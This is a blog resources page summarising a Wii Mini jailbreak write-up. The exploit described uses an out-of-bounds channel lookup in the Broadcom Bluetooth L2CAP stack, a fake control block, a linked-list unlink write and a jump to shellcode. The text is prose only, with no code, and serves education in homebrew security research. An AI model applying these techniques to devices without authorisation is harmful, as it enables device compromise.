Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

The Wii Mini is a version of the Wii that is completely stripped down of the SD card, internet capabilities, GameCube functionality... it is only usable for Wii games offline. The author wanted to root the Wii Mini but with the little attack surface it was hard! After looking at the camera library, various games and a few other things, they landed on the bluetooth stack.

The Broadcom Bluetooth stack was open sourced years ago because it is used in a myriad of Android devices. The stack originally went by the name Bluedroid but goes by Floride now.

Part of the bluetooth stack includes the l2cap layer. This is similar to a TCP packet in the web stack, as it provides packet segmentation/reassembly, retransmission and a port-like interface called channels. When a connection is made, a channel is allocated for that service.

When passing back information about the channels in the l2cap packets, there is a bug. The channel structure (Channel Control Block - CCB) has a helper function for locating a CCB given a channel ID. The helper function validates that reserved IDs are not used. However, it does NOT have an upper bounds check! This leads to an out of bounds access on the CCB.

In order to exploit this, we needed to create a fake CCB structure. Luckily for us, this sits in the .bss section (which is static)! After doing manual code review, the author found a small buffer that handles the SDP client. This buffer is an array of 0x15 elements of type uint32_t. Even though our structure is much larger than this, the only things needed to make this structure work are in the beginning of the struct!

To make this exploitable though, it becomes much harder to actually do. Many of the final elements would have been nice to have control of, such as a function pointer. The author saw the channel state, a doubly linked list pointer and id fields.

Using the doubly linked list, we can create an arbitrary write primitive when unlinking the element! This does write in both directions but we can definitely make this work. To avoid crashing, we can set specific settings to hit only code that we want to hit. After some investigating, this was possible to do.

The author uses the arbitrary write with the doubly linked list to overwrite a function pointer with address to shellcode. Because the Wii has no ASLR or DEP, code execution from this point is trivial. Since the SDP client provides another big 1000 byte buffer in the bss section that is controllable, we send execution here. This is a secondary loader that fixes the state of the program and loads a USB loader as a secondary part of the exploit. Wii compromised!